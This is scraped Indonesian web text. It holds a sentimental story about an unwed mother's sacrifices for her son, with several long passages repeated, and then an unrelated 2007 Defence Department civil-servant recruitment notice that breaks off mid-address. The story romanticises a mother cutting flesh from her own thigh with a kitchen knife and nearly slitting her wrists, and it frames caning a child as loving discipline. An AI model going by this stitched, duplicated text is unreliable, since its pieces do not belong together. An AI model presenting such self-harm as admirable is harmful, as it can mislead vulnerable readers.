telah kehilangan satu2nya alasan untuk hidup, anaknya tercinta.
Kemudian ibu yang malang itu mengambil pisau dapur untuk memotong urat
nadinya. Tetapi saat akan dilakukan, ia sadar bahwa anaknya mungkin
tidak akan diperlakukan dengan baik. Tidak, ia harus hidup untuk
mengetahui bahwa anaknya diperlakukan dengan baik. Segera, niat bunuh
diri itu dibatalkan, demi anaknya juga??..
============ 000====== ===
Setahun berlalu. Sang ibu telah pindah ke tempat lain, mendapatkan
kerja yang lebih baik lagi. Sang anak telah sehat, walaupun tetap
menjalani
perawatan medis secara rutin setiap bulan.
Seperti biasa, sang anak ingat akan hari ulang tahun ibunya.
Uang pun dapat ia peroleh dengan mudah, tanpa perlu bersusah payah
mengumpulkannya. Maka, pada hari tsb, sepulang dari sekolah, ia tidak
pulang ke rumah, ia segera naik bus menuju ke desa tempat tinggal
ibunya, yang memakan waktu beberapa jam. Sang anak telah mempersiapkan
setangkai bunga, sepucuk surat yang menyatakan ia setiap hari
merindukan ibu, sebuah kartu ucapan selamat ulang tahun, dan nilai ujian
yang
sangat bagus. Ia akan memberikan semuanya untuk ibu.
Sang anak berlari riang gembira melewati gang-gang kecil menuju
rumahnya. Tetapi ketika sampai di rumah, ia mendapati rumah ini telah
kosong. Tetangga mengatakan ibunya telah pindah, dan tidak ada yang
tahu kemana ibunya pergi. Sang anak tidak tahu harus berbuat apa, ia
duduk di
depan rumah tsb, menangis "Ibu benar2 tidak menginginkan saya lagi."
Sementara itu, keluarga sang ayah begitu cemas, ketika sang anak sudah
terlambat pulang ke rumah selama lebih dari 3 jam. Guru sekolah
mengatakan semuanya sudah pulang. Semua tempat sudah dicari, tetapi
tidak ada kabar.
Mereka panik. Sang ayah menelpon ibunya, yang juga sangat terkejut.
Polisi pun dihubungi untuk melaporkan anak hilang.
Ketika sang ibu sedang berpikir keras, tiba2 ia teringat sesuatu. Hari
ini adalah hari ulang tahunnya. Ia terlalu sibuk sampai melupakannya.
Anaknya mungkin pulang ke rumah. Maka sang ayah dan sang ibu segera
naik mobil menuju rumah tsb. Sayangnya, mereka hanya menemukan kartu
ulang ahun, setangkai bunga, nilai ujian yang bagus, dan sepucuk surat
anaknya.
Sang ibu tidak mampu menahan tangisannya, saat membaca tulisan2 imut
anaknya dalam surat itu.
Hari mulai gelap. Mereka sibuk mencari di sekitar desa tsb, tanpa
mendapatkan petunjuk apapun. Sang ibu semakin resah. Kemudian sang ibu
membakar dupa, berlutut di hadapan altar Dewi Kuan Im, sambil menangis
ia memohon agar bisa menemukan anaknya.
Seperti mendapat petunjuk, sang ibu tiba2 ingat bahwa ia dan anaknya
pernah pergi ke sebuah kuil Kuan Im di desa tsb. Ibunya pernah berkata,
bahwa bila kamu memerlukan pertolongan, mohonlah kepada Dewi Kuan Im
yang welas asih.
Dewi Kuan Im pasti akan menolongmu, jika niat kamu baik. Ibunya
memprediksikan bahwa anaknya mungkin pergi ke kuil tsb untuk memohon
agar bisa bertemu dengan dirinya.
Benar saja, ternyata sang anak berada di sana. Tetapi ia pingsan,
demamnya tinggi sekali. Sang ayah segera menggendong anaknya untuk
dilarikan ke rumah sakit. Saat menuruni tangga kuil, sang ibu terjatuh
dari tangga, dan berguling2 jatuh ke bawah????..
============ 000====== ========
Sepuluh tahun sudah berlalu. Kini sang anak sudah memasuki bangku
kuliah. Ia sering beradu mulut dengan ayah, mengenai persoalan ibunya.
Sejak jatuh dari tangga, ibunya tidak pernah ditemukan. Sang anak telah
banyak menghabiskan uang untuk mencari ibunya kemana2, tetapi hasilnya
nihil.
Siang itu, seperti biasa sehabis kuliah, sang anak berjalan bersama
dengan teman wanitanya. Mereka tampak serasi. Saat melaju dengan mobil,
di persimpangan sebuah jalan, ia melihat seorang wanita tua yang sedang
mengemis. Ibu tsb terlihat kumuh, dan tampak memakai tongkat. Ia tidak
pernah melihat wanita itu sebelumnya. Wajahnya kumal, dan ia tampak
berkomat-kamit.
Di dorong rasa ingin tahu, ia menghentikan mobilnya, dan turun bersama
pacar untuk menghampiri pengemis tua itu. Ternyata sang pengemis tua
sambil mengacungkan kaleng kosong untuk minta sedekah, ia berucap
dengan lemah "Dimanakah anakku? Apakah kalian melihat anakku?"
Sang anak merasa mengenal wanita tua itu. Tanpa disadari, ia segera
menyanyikan lagu "Shi Sang Ci You Mama Hau" dengan suara perlahan, tak
disangka sang pengemis tua ikut menyanyikannya dengan suara lemah.
Mereka berdua menyanyi bersama. Ia segera mengenal suara ibunya yang
selalu menyanyikan lagu tsb saat ia kecil, sang anak segera memeluk
pengemis
tua itu dan berteriak dengan haru "Ibu? Ini saya ibu".
Sang pengemis tua itu terkejut, ia meraba2 muka sang anak, lalu
bertanya, "Apakah kamu ??..(nama anak itu)?" "Benar bu, saya adalah anak
ibu?".
Keduanya pun berpelukan dengan erat, air mata keduanya berbaur
membasahi bumi???.
Karena jatuh dari tangga, sang ibu yang terbentur kepalanya menjadi
hilang ingatan, tetapi ia setiap hari selama sepuluh tahun terus mencari
anaknya, tanpa peduli dengan keadaaan dirinya. Sebagian orang
menganggapnya sebagai orang gila?.
============ 000====== =======
Dalam kondisi kritis, Ibu kita akan melakukan apa saja demi kita. Ibu
bahkan rela mengorbankan nyawanya?..
Simaklah penggalan doa keputusasaan berikut ini, di saat Ibu masih
muda, ataupun disaat Ibu sudah tua :
1. Anakku masih kecil, masa depannya masih panjang. Oh Tuhan, ambillah
aku sebagai gantinya.
2. Aku sudah tua, Oh Tuhan, ambillah aku sebagai gantinya.
Diantara orang2 disekeliling Anda, yang Anda kenal, Saudara/I kandung
Anda, diantara lebih dari 6 Milyar manusia, siapakah yang rela
mengorbankan nyawanya untuk Anda, kapan pun, dimana pun, dengan cara
apapun ?
Tidak diragukan lagi
"Ibu kita adalah Orang Yang Paling Mulia di dunia ini"
Alkisah, ada sepasang kekasih yang saling mencintai. Sang pria berasal
dari keluarga kaya, dan merupakan orang yang terpandang di kota
tersebut. Sedangkan sang wanita adalah seorang yatim piatu, hidup serba
kekurangan, tetapi cantik, lemah lembut, dan baik hati. Kelebihan inilah
yang membuat sang pria jatuh hati.
Sang wanita hamil di luar nikah. Sang pria lalu mengajaknya menikah,
dengan membawa sang wanita ke rumahnya. Seperti yang sudah mereka duga,
orang tua sang pria tidak menyukai wanita tsb. Sebagai orang yang
terpandang di kota tsb, latar belakang wanita tsb akan merusak reputasi
keluarga. Sebaliknya, mereka bahkan telah mencarikan jodoh yang sepadan
untuk anaknya. Sang pria berusaha menyakinkan orang tuanya, bahwa ia
sudah menetapkan keputusannya, apapun resikonya bagi dia.
Sang wanita merasa tak berdaya, tetapi sang pria menyakinkan wanita tsb
bahwa tidak ada yang bisa memisahkan mereka. Sang pria terus berargumen
dengan orang tuanya, bahkan membantah perkataan orangtuanya, sesuatu
yang belum pernah dilakukannya selama hidupnya (di zaman dulu, umumnya
seorang anak sangat tunduk pada orang tuanya).
Sebulan telah berlalu, sang pria gagal untuk membujuk orang tuanya agar
menerima calon istrinya. Sang orang tua juga stress karena gagal
membujuk anak satu-satunya, agar berpisah dengan wanita tsb, yang
menurut mereka akan sangat merugikan masa depannya.
Sang pria akhirnya menetapkan pilihan untuk kawin lari.
Ia memutuskan untuk meninggalkan semuanya demi sang kekasih. Waktu
keberangkatan pun ditetapkan, tetapi rupanya rencana ini diketahui oleh
orang tua sang pria. Maka ketika saatnya tiba, sang ortu mengunci
anaknya di dalam kamar dan dijaga ketat oleh para bawahan di rumahnya
yang besar.
Sebagai gantinya, kedua orang tua datang ke tempat yang telah
ditentukan sepasang kekasih tsb untuk melarikan diri. Sang wanita sangat
terkejut dengan kedatangan ayah dan ibu sang pria. Mereka kemudian
memohon pengertian dari sang wanita, agar meninggalkan anak mereka satu-
satunya.
Menurut mereka, dengan perbedaan status sosial yang sangat besar,
perkawinan mereka hanya akan menjadi gunjingan seluruh penduduk kota,
reputasi anaknya akan tercemar, orang2 tidak akan menghormatinya lagi.
Akibatnya, bisnis yang akan diwariskan kepada anak mereka akan bangkrut
secara perlahan2.
Mereka bahkan memberikan uang dalam jumlah banyak, dengan permohonan
agar wanita tsb meninggalkan kota ini, tidak bertemu dengan anaknya
lagi, dan menggugurkan kandungannya. Uang tsb dapat digunakan untuk
membiayai hidupnya di tempat lain.
Sang wanita menangis tersedu-sedu. Dalam hati kecilnya, ia sadar bahwa
perbedaan status sosial yang sangat jauh, akan menimbulkan banyak
kesulitan bagi kekasihnya. Akhirnya, ia setuju untuk meninggalkan kota
ini, tetapi menolak untuk menerima uang tsb. Ia mencintai sang pria,
bukan uangnya. Walaupun ia sepenuhnya sadar, jalan hidupnya ke depan
akan sangat sulit?.
Ibu sang pria kembali memohon kepada wanita tsb untuk meninggalkan
sepucuk surat kepada mereka, yang menyatakan bahwa ia memilih berpisah
dengan sang pria. Ibu sang pria kuatir anaknya akan terus mencari
kekasihnya, dan tidak mau meneruskan usaha orang tuanya. "Walaupun ia
kelak bukan suamimu, bukankah Anda ingin melihatnya sebagai seseorang
yang berhasil? Ini adalah untuk kebaikan kalian berdua", kata sang ibu.
Dengan berat hati, sang wanita menulis surat. Ia menjelaskan bahwa ia
sudah memutuskan untuk pergi meninggalkan sang pria. Ia sadar bahwa
keberadaannya hanya akan merugikan sang pria. Ia minta maaf karena
telah melanggar janji setia mereka berdua, bahwa mereka akan selalu
bersama
dalam menghadapi penolakan2 akibat perbedaan status sosial mereka. Ia
tidak kuat lagi menahan penderitaan ini, dan memutuskan untuk berpisah.
Tetesan air mata sang wanita tampak membasahi surat tersebut.
Sang wanita yang malang tsb tampak tidak punya pilihan lain.
Ia terjebak antara moral dan cintanya. Sang wanita segera meninggalkan
kota itu, sendirian. Ia menuju sebuah desa yang lebih terpencil. Disana,
ia
bertekad untuk melahirkan dan membesarkan anaknya.
==========000000000 0======== ======
Tiga tahun telah berlalu. Ternyata wanita tersebut telah menjadi
seorang ibu. Anaknya seorang laki2. Sang ibu bekerja keras siang dan
malam,
untuk membiayai kehidupan mereka. Di pagi dan siang hari, ia bekerja di
sebuah industri rumah tangga, malamnya, ia menyuci pakaian2 tetangga dan
menyulam sesuai dengan pesanan pelanggan. Kebanyakan ia melakukan semua
pekerjaan ini sambil menggendong anak di punggungnya. Walaupun ia cukup
berpendidikan, ia menyadari bahwa pekerjaan lain tidak memungkinkan,
karena ia harus berada di sisi anaknya setiap saat. Tetapi sang ibu
tidak pernah mengeluh dengan pekerjaannya?
Di usia tiga tahun, suatu saat, sang anak tiba2 sakit keras.
Demamnya sangat tinggi. Ia segera dibawa ke rumah sakit setempat. Anak
tsb harus menginap di rumah sakit selama beberapa hari. Biaya pengobatan
telah menguras habis seluruh tabungan dari hasil kerja kerasnya selama
ini, dan itupun belum cukup. Ibu tsb akhirnya juga meminjam ke
sana-sini, kepada siapapun yang bermurah hati untuk memberikan
pinjaman.
Saat diperbolehkan pulang, sang dokter menyarankan untuk membuat sup
ramuan, untuk mempercepat kesembuhan putranya. Ramuan tsb terdiri dari
obat2 herbal dan daging sapi untuk dikukus bersama. Tetapi sang ibu
hanya mampu membeli obat2 herbal tsb, ia tidak punya uang sepeserpun
lagi untuk membeli daging. Untuk meminjam lagi, rasanya tak mungkin,
karena ia telah berutang kepada semua orang yang ia kenal, dan belum
terbayar.
Ketika di rumah, sang ibu menangis. Ia tidak tahu harus berbuat apa,
untuk mendapatkan daging. Toko daging di desa tsb telah menolak
permintaannya, untuk bayar di akhir bulan saat gajian.
Diantara tangisannya, ia tiba2 mendapatkan ide. Ia mencari alkohol yang
ada di rumahnya, sebilah pisau dapur, dan sepotong kain.
Setelah pisau dapur dibersihkan dengan alkohol, sang ibu nekad
mengambil sekerat daging dari pahanya. Agar tidak membangunkan anaknya
yang sedang
tidur, ia mengikat mulutnya dengan sepotong kain. Darah berhamburan.
Sang ibu tengah berjuang mengambil dagingnya sendiri, sambil berusaha
tidak
mengeluarkan suara kesakitan yang teramat sangat?..
Hujan lebatpun turun. Lebatnya hujan menyebabkan rintihan kesakitan
sang ibu tidak terdengar oleh para tetangga, terutama oleh anaknya
sendiri.
Tampaknya langit juga tersentuh dengan pengorbanan yang sedang
dilakukan oleh sang ibu???.
==========000000000 0======== ======
Enam tahun telah berlalu, anaknya tumbuh menjadi seorang anak yang
tampan, cerdas, dan berbudi pekerti. Ia juga sangat sayang ibunya.
Di hari minggu, mereka sering pergi ke taman di desa tersebut, bermain
bersama, dan bersama2 menyanyikan lagu "Shi Sang Chi You Mama Hau"
(terjemahannya "Di Dunia ini, hanya ibu seorang yang baik").
Sang anak juga sudah sekolah. Sang ibu sekarang bekerja sebagai penjaga
toko, karena ia sudah bisa meninggalkan anaknya di siang hari.
Hari2 mereka lewatkan dengan kebersamaan, penuh kebahagiaan. Sang anak
terkadang memaksa ibunya, agar ia bisa membantu ibunya menyuci di malam
hari. Ia tahu ibunya masih menyuci di malam hari, karena perlu tambahan
biaya untuk sekolahnya. Ia memang seorang anak yang cerdas.
Ia juga tahu, bulan depan adalah hari ulang tahun ibunya.
Ia berniat membelikan sebuah jam tangan, yang sangat didambakan ibunya
selama ini. Ibunya pernah mencobanya di sebuah toko, tetapi segera
menolak setelah pemilik toko menyebutkan harganya. Jam tangan itu
sederhana, tidak terlalu mewah, tetapi bagi mereka, itu terlalu mahal.
Masih banyak keperluan lain yang perlu dibiayai.
Sang anak segera pergi ke toko tsb, yang tidak jauh dari rumahnya. Ia
meminta kepada kakek pemilik toko agar menyimpan jam tangan tsb, karena
ia akan membelinya bulan depan. "Apakah kamu punya uang?" tanya sang
pemilik toko. "Tidak sekarang, nanti saya akan punya", kata sang anak
dengan serius.
Ternyata, bulan depan sang anak benar2 muncul untuk membeli jam tangan
tsb. Sang kakek juga terkejut, kiranya sang anak hanya main2.
Ketika menyerahkan uangnya, sang kakek bertanya "Dari mana kamu
mendapatkan uang itu? Bukan mencuri kan?". "Saya tidak mencuri, kakek.
Hari ini
adalah hari ulang tahun ibuku. Saya biasanya naik becak pulang pergi ke
sekolah.
Selama sebulan ini, saya berjalan kaki saat pulang dari sekolah ke
rumah, uang jajan dan uang becaknya saya simpan untuk beli jam ini.
Kakiku sakit,
tapi ini semua untuk ibuku. O ya, jangan beritahu ibuku tentang hal
ini. Ia akan marah" kata sang anak. Sang pemilik toko tampak kagum pada
anak tsb.
Seperti biasanya, sang ibu pulang dari kerja di sore hari.
Sang anak segera memberikan ucapan selamat pada ibu, dan menyerahkan
jam tangan tsb. Sang ibu terkejut bercampur haru, ia bangga dengan
anaknya.
Jam tangan ini memang adalah impiannya. Tetapi sang ibu tiba2 tersadar,
dari mana uang untuk membeli jam tsb. Sang anak tutup mulut, tidak mau
menjawab.
"Apakah kamu mencuri, Nak?" Sang anak diam seribu bahasa, ia tidak
ingin ibu mengetahui bagaimana ia mengumpulkan uang tersebut.
Setelah ditanya berkali2 tanpa jawaban, sang ibu menyimpulkan bahwa
anaknya telah mencuri. "Walaupun kita miskin, kita tidak boleh mencuri.
Bukankah
ibu sudah mengajari kamu tentang hal ini?" kata sang ibu.
Lalu ibu mengambil rotan dan mulai memukul anaknya.
Biarpun ibu sayang pada anaknya, ia harus mendidik anaknya sejak kecil.
Sang anak menangis, sedangkan air mata sang ibu mengalir keluar. Hatinya
begitu
perih, karena ia sedang memukul belahan hatinya. Tetapi ia harus
melakukannya, demi kebaikan anaknya.
Suara tangisan sang anak terdengar keluar. Para tetangga menuju ke
rumah tsb heran, dan kemudian prihatin setelah mengetahui kejadiannya.
"Ia sebenarnya anak yang baik", kata salah satu tetangganya. Kebetulan
sekali, sang pemilik toko sedang berkunjung ke rumah salah satu
tetangganya yang merupakan familinya.
Ketika ia keluar melihat ke rumah itu, ia segera mengenal anak itu.
Ketika mengetahui persoalannya, ia segera menghampiri ibu itu untuk
menjelaskan. Tetapi tiba2 sang anak berlari ke arah pemilik toko,
memohon agar jangan menceritakan yang sebenarnya pada ibunya.
"Nak, ketahuilah, anak yang baik tidak boleh berbohong, dan tidak boleh
menyembunyikan sesuatu dari ibunya". Sang anak mengikuti nasehat kakek
itu. Maka kakek itu mulai menceritakan bagaimana sang anak tiba2 muncul
di tokonya sebulan yang lalu, memintanya untuk menyimpan jam
tangan tsb, dan sebulan kemudian akan membelinya. Anak itu muncul siang
tadi di tokonya, katanya hari ini adalah hari ulang tahun ibunya. Ia
juga
menceritakan bagaimana sang anak berjalan kaki dari sekolahnya pulang
ke rumah dan tidak jajan di sekolah selama sebulan ini, untuk
mengumpulkan
uang membeli jam tangan kesukaan ibunya.
Tampak sang kakek meneteskan air mata saat selesai menjelaskan hal tsb,
begitu pula dengan tetangganya. Sang ibu segera memeluk anak
kesayangannya, keduanya menangis dengan tersedu-sedu? ."Maafkan saya,
Nak."
"Tidak Bu, saya yang bersalah"??? ..
===========000= ========= =======
Sementara itu, ternyata ayah dari sang anak sudah menikah, tetapi
istrinya mandul. Mereka tidak punya anak. Sang ortu sangat sedih akan
hal ini, karena tidak akan ada yang mewarisi usaha mereka kelak.
Ketika sang ibu dan anaknya berjalan2 ke kota, dalam sebuah kesempatan,
mereka bertemu dengan sang ayah dan istrinya. Sang ayah baru menyadari
bahwa sebenarnya ia sudah punya anak dari darah dagingnya sendiri.
Ia mengajak mereka berkunjung ke rumahnya, bersedia menanggung semua
biaya hidup mereka, tetapi sang ibu menolak. Kami bisa hidup dengan baik
tanpa bantuanmu.
Berita ini segera diketahui oleh orang tua sang pria.
Mereka begitu ingin melihat cucunya, tetapi sang ibu tidak mau
mengizinkan.
===========000= ========= ========
Di pertengahan tahun, penyakit sang anak kembali kambuh.
Dokter mengatakan bahwa penyakit sang anak butuh operasi dan perawatan
yang konsisten. Kalau kambuh lagi, akan membahayakan jiwanya.
Keuangan sang ibu sudah agak membaik, dibandingkan sebelumnya. Tetapi
biaya medis tidaklah murah, ia tidak sanggup membiayainya.
Sang ibu kembali berpikir keras. Tetapi ia tidak menemukan solusi yang
tepat. Satu2nya jalan keluar adalah menyerahkan anaknya kepada sang
ayah, karena sang ayahlah yang mampu membiayai perawatannya.
Maka di hari Minggu ini, sang ibu kembali mengajak anaknya berkeliling
kota, bermain2 di taman kesukaan mereka. Mereka gembira sekali,
menyanyikan lagu "Shi Sang Chi You Mama Hau", lagu kesayangan mereka.
Untuk sejenak, sang ibu melupakan semua penderitaannya, ia hanyut dalam
kegembiraan bersama sang anak.
Sepulang ke rumah, ibu menjelaskan keadaannya pada sang anak.
Sang anak menolak untuk tinggal bersama ayahnya, karena ia hanya ingin
dengan ibu. "Tetapi ibu tidak mampu membiayai perawatan kamu, Nak"
kata ibu.
"Tidak apa2 Bu, saya tidak perlu dirawat. Saya sudah sehat, bila bisa
bersama2 dengan ibu. Bila sudah besar nanti, saya akan cari banyak uang
untuk biaya perawatan saya dan untuk ibu. Nanti, ibu tidak perlu
bekerja lagi, Bu", kata sang anak. Tetapi ibu memaksa akan berkunjung ke
rumah
sang ayah keesokan harinya. Penyakitnya memang bisa kambuh setiap saat.
Disana ia diperkenalkan dengan kakek dan neneknya.
Keduanya sangat senang melihat anak imut tersebut. Ketika ibunya hendak
pulang, sang anak meronta2 ingin ikut pulang dengan ibunya. Walaupun
diberikan
mainan kesukaan sang anak, yang tidak pernah ia peroleh saat bersama
ibunya, sang anak menolak. "Saya ingin Ibu, saya tidak mau mainan itu",
teriak
sang anak dengan nada yang polos. Dengan hati sedih dan menangis, sang
ibu berkata
"Nak, kamu harus dengar nasehat ibu. Tinggallah di sini. Ayah, kakek
dan nenek akan bermain bersamamu." "Tidak, aku tidak mau mereka. Saya
hanya
mau ibu, saya sayang ibu, bukankah ibu juga sayang saya? Ibu sekarang
tidak mau saya lagi", sang anak mulai menangis.
Bujukan demi bujukan ibunya untuk tinggal di rumah besar tsb tidak
didengarkan anak kecil tsb. Sang anak menangis tersedu2 "Kalau ibu
sayang padaku, bawalah saya pergi, Bu". Sampai pada akhirnya, ibunya
memaksa dengan mengatakan "Benar, ibu tidak sayang kamu lagi. Tinggallah
disini", ibunya segera lari keluar meninggalkan rumah tsb. Tampak
anaknya meronta2 dengan ledakan tangis yang memilukan.
Di rumah, sang ibu kembali meratapi nasibnya. Tangisannya begitu
menyayat hati, ia telah berpisah dengan anaknya. Ia tidak diperbolehkan
menjenguk anaknya, tetapi mereka berjanji akan merawat anaknya dengan
baik.
Diantara isak tangisnya, ia tidak menemukan arti hidup ini lagi. Ia
telah kehilangan satu2nya alasan untuk hidup, anaknya tercinta.
Kemudian ibu yang malang itu mengambil pisau dapur untuk memotong urat
nadinya. Tetapi saat akan dilakukan, ia sadar bahwa anaknya mungkin
tidak akan diperlakukan dengan baik. Tidak, ia harus hidup untuk
mengetahui bahwa anaknya diperlakukan dengan baik. Segera, niat bunuh
diri itu dibatalkan, demi anaknya juga??..
============ 000====== ===
Setahun berlalu. Sang ibu telah pindah ke tempat lain, mendapatkan
kerja yang lebih baik lagi. Sang anak telah sehat, walaupun tetap
menjalani
perawatan medis secara rutin setiap bulan.
Seperti biasa, sang anak ingat akan hari ulang tahun ibunya.
Uang pun dapat ia peroleh dengan mudah, tanpa perlu bersusah payah
mengumpulkannya. Maka, pada hari tsb, sepulang dari sekolah, ia tidak
pulang ke rumah, ia segera naik bus menuju ke desa tempat tinggal
ibunya, yang memakan waktu beberapa jam. Sang anak telah mempersiapkan
setangkai bunga, sepucuk surat yang menyatakan ia setiap hari
merindukan ibu, sebuah kartu ucapan selamat ulang tahun, dan nilai ujian
yang
sangat bagus. Ia akan memberikan semuanya untuk ibu.
Sang anak berlari riang gembira melewati gang-gang kecil menuju
rumahnya. Tetapi ketika sampai di rumah, ia mendapati rumah ini telah
kosong. Tetangga mengatakan ibunya telah pindah, dan tidak ada yang
tahu kemana ibunya pergi. Sang anak tidak tahu harus berbuat apa, ia
duduk di
depan rumah tsb, menangis "Ibu benar2 tidak menginginkan saya lagi."
Sementara itu, keluarga sang ayah begitu cemas, ketika sang anak sudah
terlambat pulang ke rumah selama lebih dari 3 jam. Guru sekolah
mengatakan semuanya sudah pulang. Semua tempat sudah dicari, tetapi
tidak ada kabar.
Mereka panik. Sang ayah menelpon ibunya, yang juga sangat terkejut.
Polisi pun dihubungi untuk melaporkan anak hilang.
Ketika sang ibu sedang berpikir keras, tiba2 ia teringat sesuatu. Hari
ini adalah hari ulang tahunnya. Ia terlalu sibuk sampai melupakannya.
Anaknya mungkin pulang ke rumah. Maka sang ayah dan sang ibu segera
naik mobil menuju rumah tsb. Sayangnya, mereka hanya menemukan kartu
ulang ahun, setangkai bunga, nilai ujian yang bagus, dan sepucuk surat
anaknya.
Sang ibu tidak mampu menahan tangisannya, saat membaca tulisan2 imut
anaknya dalam surat itu.
Hari mulai gelap. Mereka sibuk mencari di sekitar desa tsb, tanpa
mendapatkan petunjuk apapun. Sang ibu semakin resah. Kemudian sang ibu
membakar dupa, berlutut di hadapan altar Dewi Kuan Im, sambil menangis
ia memohon agar bisa menemukan anaknya.
Seperti mendapat petunjuk, sang ibu tiba2 ingat bahwa ia dan anaknya
pernah pergi ke sebuah kuil Kuan Im di desa tsb. Ibunya pernah berkata,
bahwa bila kamu memerlukan pertolongan, mohonlah kepada Dewi Kuan Im
yang welas asih.
Dewi Kuan Im pasti akan menolongmu, jika niat kamu baik. Ibunya
memprediksikan bahwa anaknya mungkin pergi ke kuil tsb untuk memohon
agar bisa bertemu dengan dirinya.
Benar saja, ternyata sang anak berada di sana. Tetapi ia pingsan,
demamnya tinggi sekali. Sang ayah segera menggendong anaknya untuk
dilarikan ke rumah sakit. Saat menuruni tangga kuil, sang ibu terjatuh
dari tangga, dan berguling2 jatuh ke bawah????..
============ 000====== ========
Sepuluh tahun sudah berlalu. Kini sang anak sudah memasuki bangku
kuliah. Ia sering beradu mulut dengan ayah, mengenai persoalan ibunya.
Sejak jatuh dari tangga, ibunya tidak pernah ditemukan. Sang anak telah
banyak menghabiskan uang untuk mencari ibunya kemana2, tetapi hasilnya
nihil.
Siang itu, seperti biasa sehabis kuliah, sang anak berjalan bersama
dengan teman wanitanya. Mereka tampak serasi. Saat melaju dengan mobil,
di persimpangan sebuah jalan, ia melihat seorang wanita tua yang sedang
mengemis. Ibu tsb terlihat kumuh, dan tampak memakai tongkat. Ia tidak
pernah melihat wanita itu sebelumnya. Wajahnya kumal, dan ia tampak
berkomat-kamit.
Di dorong rasa ingin tahu, ia menghentikan mobilnya, dan turun bersama
pacar untuk menghampiri pengemis tua itu. Ternyata sang pengemis tua
sambil mengacungkan kaleng kosong untuk minta sedekah, ia berucap
dengan lemah "Dimanakah anakku? Apakah kalian melihat anakku?"
Sang anak merasa mengenal wanita tua itu. Tanpa disadari, ia segera
menyanyikan lagu "Shi Sang Ci You Mama Hau" dengan suara perlahan, tak
disangka sang pengemis tua ikut menyanyikannya dengan suara lemah.
Mereka berdua menyanyi bersama. Ia segera mengenal suara ibunya yang
selalu menyanyikan lagu tsb saat ia kecil, sang anak segera memeluk
pengemis
tua itu dan berteriak dengan haru "Ibu? Ini saya ibu".
Sang pengemis tua itu terkejut, ia meraba2 muka sang anak, lalu
bertanya, "Apakah kamu ??..(nama anak itu)?" "Benar bu, saya adalah anak
ibu?".
Keduanya pun berpelukan dengan erat, air mata keduanya berbaur
membasahi bumi???.
Karena jatuh dari tangga, sang ibu yang terbentur kepalanya menjadi
hilang ingatan, tetapi ia setiap hari selama sepuluh tahun terus mencari
anaknya, tanpa peduli dengan keadaaan dirinya. Sebagian orang
menganggapnya sebagai orang gila?.
============ 000====== =======
Dalam kondisi kritis, Ibu kita akan melakukan apa saja demi kita. Ibu
bahkan rela mengorbankan nyawanya?..
Simaklah penggalan doa keputusasaan berikut ini, di saat Ibu masih
muda, ataupun disaat Ibu sudah tua :
1. Anakku masih kecil, masa depannya masih panjang. Oh Tuhan, ambillah
aku sebagai gantinya.
2. Aku sudah tua, Oh Tuhan, ambillah aku sebagai gantinya.
Diantara orang2 disekeliling Anda, yang Anda kenal, Saudara/I kandung
Anda, diantara lebih dari 6 Milyar manusia, siapakah yang rela
mengorbankan nyawanya untuk Anda, kapan pun, dimana pun, dengan cara
apapun ?
Tidak diragukan lagi
"Ibu kita adalah Orang Yang Paling Mulia di dunia ini"
Penerimaan CPNS Departemen Pertahanan Tahun 2007
Penerimaan CPNS Departemen Pertahanan Tahun 2007
DEPARTEMEN PERTAHANAN REPUBLIK INDONESIA
PENGUMUMAN Nomor : PENG/25/VIII/2007TENTANG
PENERIMAAN CALON PEGAWAI NEGERI SIPIL DEPARTEMEN PERTAHANAN
TINGKAT SARJANA (GOLONGAN III/b dan III/a), DIPLOMA 3 (GOLONGAN II/c) TAHUN ANGGARAN 2007
Departemen Pertahanan Republik Indonesia membuka kesempatan kepada Warga Negara Indonesia pria dan wanita :
1.Unit Organisasi Departemen Pertahanan memerlukan Calon Pegawai Negeri Sipil (CPNS) :
a.Untuk golongan III/b sebanyak 1 orang
b.Untuk golongan III/a sebanyak 2 orang
c.Untuk golongan II/c sebanyak 2 orang
2.Unit Organisasi Mabes TNI memerlukan Calon Pegawai Negeri Sipil (CPNS) :
Untuk golongan III/a sebanyak 6 orang
3.Unit Organisasi TNI AD memerlukan Calon Pegawai Negeri Sipil (CPNS) :
a.Untuk golongan III/b sebanyak 90 orang
b.Untuk golongan III/a sebanyak 32 orang
c.Untuk golongan II/c sebanyak 350 orang
4.Unit Organisasi TNI AL memerlukan Calon Pegawai Negeri Sipil (CPNS):
a.Untuk golongan III/b sebanyak 8 orang
b.Untuk golongan III/a sebanyak 1 orang
c.Untuk golongan II/c sebanyak 166 orang
5.Unit Organisasi TNI AU memerlukan Calon Pegawai Negeri Sipil (CPNS) :
a.Untuk golongan III/b sebanyak 60 orang
b.Untuk golongan III/a sebanyak 10 orang
c.Untuk golongan II/c sebanyak 306 orang
I.PERSYARATAN KHUSUS
1.Status Pelamar
a.Warga Negara Indonesia baik pria maupun wanita
b.Berkelakuan baik yang dibuktikan dengan Surat Keterangan Catatan Kepolisian.
c. Tidak pernah diberhentikan dengan hormat tidak atas permintaan sendiri atau tidak dengan hormat sebagai PNS/Anggota TNI/Polri maupun sebagai pegawai swasta dengan Surat Pernyataan.
d. Tidak berkedudukan sebagai CPNS dan tidak sedang terikat perjanjian/kontrak kerja dengan instansi lain dengan Surat Pernyataan.
e. Tidak bersuami/beristrikan seorang yang berkewarganegaraan asing atau tanpa kewarganegaraan dengan mencantumkan surat keterangan dari Kelurahan/kepala desa.
f.Usia maksimum pada tanggal 1 Oktober 2007
1)Dokter Spesialis 40 tahun.
2)Dokter Umum 35 tahun.
3)S1 dan D3 berusia 30 tahun.
2.Keadaan Jasmani dan Rohani Pelamar
a.Tinggi badan, minimal untuk Pria 160 Cm, Wanita 155 Cm
b.Berat badan mendekati ideal (tidak overweight dan tidak underweight)
c.Tidak tuna rungu dan tuna wicara
d.Memiliki dua mata (tidak juling, tidak buta warna, tidak palsu)
e.Tidak bertato dan bertindik (kecuali karena adat)
f.Berpenampilan baik
3.Tata cara pengajuan lamaran
a.Surat lamaran ditujukan untuk :
1)DEPARTEMEN PERTAHANAN
Kepada
Yth. SEKJEN DEPHAN
U.p. KARO KEPEGAWAIAN
Jalan Merdeka Barat No. 13-14
di
Jakarta Pusat kode pos : 10110
2)MABES TNI
Kepada
Yth. KASUM TNI
U.p. Aspers
Mabes TNI
Cilangkap Jakarta Timur kode pos : 13870
3)ANGKATAN DARAT
Kepada
Yth. Kepala Staf Angkatan Darat
U.p. Ka Ajendam
di
Tempat (sesuai alamat)
4)ANGKATAN LAUT
Kepada
Yth. Kepala Staf Angkatan Laut
u.p. KADISMINPERSAL
MABES AL
Cilangkap Jakarta Timur kode pos : 13870
5)ANGKATAN UDARA
Kepada
Yth. Kepala Staf Angkatan Udara
u.p. KADISMINPERSAU
MABES AU
